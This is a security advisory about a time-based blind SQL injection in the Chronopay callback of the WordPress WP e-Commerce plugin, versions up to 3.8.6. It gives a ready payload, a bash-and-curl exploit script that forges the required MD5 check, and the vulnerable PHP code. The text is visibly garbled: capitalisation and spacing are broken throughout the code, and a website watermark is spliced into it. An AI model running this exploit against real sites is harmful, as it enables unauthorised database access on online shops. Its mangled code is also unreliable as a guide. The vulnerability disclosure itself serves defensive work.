Title: WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability
Author: Miroslav Stampar (miroslav. stampar (at) gmail.com @ stamparm)
Software: http://downloads.wordpress.org/plugin/wp-e-commerce.3.8.6.zip
Tested version: 3.8.6
Annotation: parameter $ _ POST ["cs3"] = md5 (md5 (urldecode ($ _ POST ["cs1"])
# It has a "chronopay_salt" option but it's set to ''by default (see more description down below)
---------------
Test (POST data)
---------------
Http://www.bkjia.com /? Chronopay_callback = true
Cs2 = chronopay & cs1 =-1 AND 1 = IF (2> 1, BENCHMARK (5000000, MD5 (CHAR (115,113,108,109, 97,112), 0) % 23 & cs3 = 123f7bcd4ba53fade05886a7e77bf045 & transaction_type = rebill
Example.
#! /Bin/bash
Payload = "-1 AND 1 = IF (2> 1, BENCHMARK (5000000, MD5 (CHAR (115,113,108,109, 97,112), 0 )#"
Hash = 'echo-n $ payload | md5sum | tr-d '\ n' | sed's/\ s *-\ s * // G' | md5sum | tr-d '\ n' | sed's/\ s *-\ s * // g''
Curl -- data "cs2 = chronopay & cs1 = $ payload & cs3 = $ hash & transaction_type = rebill" http://www.site.com /? Chronopay_callback = true
---------------
Defect code
---------------
./Wp-e-commerce/wp-shopping-cart.php:
Class WP_eCommerce {
Function WP_eCommerce (){
Add_action ('ins INS _ loaded', array ($ this, 'init '), 8 );
}
Function init (){
...
$ This-> load ();
...
}
Function load (){
...
Wpsc_core_load_gateways ();
...
}
...
$ Wpec = new WP_eCommerce ();
./Wp-e-commerce/wpsc-core/wpsc-functions.php:
Function wpsc_core_load_gateways (){
Global $ nzshpcrt_gateways, $ num, $ wpsc_gateways, $ gateway_checkout_form_fields;
$ Gateway_directory = WPSC_FILE_PATH. '/wpsc-merchants ';
$ Nzshpcrt_merchant_list = wpsc_list_dir ($ gateway_directory );
$ Num = 0;
Foreach ($ nzshpcrt_merchant_list as $ nzshpcrt_merchant ){
If (stristr ($ nzshpcrt_merchant, '. php ')){
Require (WPSC_FILE_PATH. '/wpsc-merchants/'. $ nzshpcrt_merchant );
}
./Wp-e-commerce/wpsc-merchants/chronopay. php:
Function nzshpcrt_chronopay_callback ()
{
...
If (isset ($ _ GET ['chronopay _ callback']) & ($ _ GET ['chronopay _ callback'] = 'true ') & ($ _ POST ['cs2'] = 'chronopa '))
{
Www.2cto.com $ salt = get_option ('chronopay _ salt ');
//-This is by default ''and set only if explicitly stated
// Inside Store Settings-> Payments-> General Settings->
// Chronopay-> Edit-> Security Key
//-Problem is that there are more popular payment gateways enlisted (e.g.
// Google Checkout and PayPal) and if that setting is not explicitly set
// It wide opens the door to the potential attacker
$ Gen_hash = md5 ($ salt. md5 ($ _ POST ['cs1']. $ salt ));
If ($ gen_hash ==$ _ POST ['cs3'])
{
...
$ Sessionid = trim (stripslashes ($ _ POST ['cs1']);
$ Transaction_id = trim (stripslashes ($ _ POST ['transaction _ id']);
$ Verification_data ['Trans _ id'] = trim (stripslashes ($ _ POST ['transaction _ id']);
$ Verification_data ['Trans _ type'] = trim (stripslashes ($ _ POST ['transaction _ type']);
Switch ($ verification_data ['Trans _ type'])
{
...
Case 'rebill ':
$ Wpdb-> query ("Update'". WPSC_TABLE_PURCHASE_LOGS. "'set
'Processed' = '2 ',
'Transactid' = '". $ transaction_id ."',
'Date' = '". time ()."'
WHERE 'sessionid' = ". $ sessionid." LIMIT 1 ");
...
Add_action ('init ', 'nzshpcrt _ chronopay_callback ');